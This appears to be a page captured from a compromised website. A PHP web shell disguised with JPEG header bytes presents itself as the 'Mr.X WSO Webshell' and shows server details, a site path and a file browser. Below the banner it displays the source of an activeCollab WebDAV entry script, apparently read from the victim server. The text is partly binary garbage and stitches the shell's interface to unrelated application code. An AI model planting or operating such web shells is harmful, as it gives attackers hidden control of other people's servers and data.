����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 22:07:55 1999.30 GB Free: 66.98 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
define('PUBLIC_PATH', dirname(__FILE__));
$config_file = realpath(PUBLIC_PATH . '/../config/config.php');
if(is_file($config_file)) {
require_once($config_file);
ini_set("default_charset", "UTF-8");
ini_set("error_reporting", "");
require ROOT . '/angie.php';
require ANGIE_PATH . '/init.php';
$application =& application();
$application->prepare(array(
'initialize_resources' => true,
'connect_to_database' => true,
'initialize_smarty' => true,
'init_modules' => true,
'authenticate' => true,
'init_locale' => true,
'load_hooks' => true,
));//array
$application->init();
include_once WEBDAV_MODULE_PATH.'/models/Authenticate.php';
$not_installed_modules = Modules::findNotInstalled();
foreach ($not_installed_modules as $module) {
if ($module->name == 'webdav') {
header("HTTP/1.1 503 Service Unavailable");
die('Module is not installed');
}
}
if (!ConfigOptions::getValue('webdav_enabled')) {
header("HTTP/1.1 503 Service Unavailable");
die('Module has been disabled by administrator');
}//if
$realm = 'activeCollab webdav area';
$sapi_type = php_sapi_name();
$phpcgi = (substr($sapi_type, 0, 3) == 'cgi') ? true : false;
$user = AuthenticationBasicHTTP($realm,$phpcgi);
require_once WEBDAV_MODULE_PATH . '/models/Filesystem.php';
$server = new HTTP_WebDAV_Server_Filesystem();
$server->ServeRequest(false,$user);
} else {
header("HTTP/1.1 503 Service Unavailable");
die();
} // if
?>